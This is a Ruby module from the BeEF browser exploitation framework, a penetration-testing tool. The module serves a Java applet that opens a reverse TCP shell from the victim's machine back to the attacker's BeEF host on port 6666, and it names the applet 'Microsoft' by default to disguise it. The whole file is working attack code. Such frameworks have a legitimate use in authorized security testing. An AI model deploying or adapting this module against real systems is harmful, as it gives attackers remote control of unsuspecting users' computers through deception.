Files
beef/modules/exploits/local_host/java_payload/module.rb

29 lines
1.1 KiB
Ruby
Executable File

#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Java_payload < BeEF::Core::Command
def pre_send
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/local_host/java_payload/Applet_ReverseTCP.jar', '/anti', 'jar')
end
def self.options
@configuration = BeEF::Core::Configuration.instance
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
return [
{'name' => 'conn', 'ui_label' => 'Payload', 'value' => 'ReverseTCP'},
{'name' => 'cbHost', 'ui_label' => 'Connect Back to Host', 'value' => beef_host},
{'name' => 'cbPort', 'ui_label' => 'Connect Back to Port', 'value' => '6666'},
{'name' => 'applet_id', 'ui_label' => 'Applet id', 'value' => rand(32**20).to_s(32)},
{'name' => 'applet_name', 'ui_label' => 'Applet name', 'value' => 'Microsoft'}
]
end
def post_execute
save({'result' => @datastore['result']})
end
end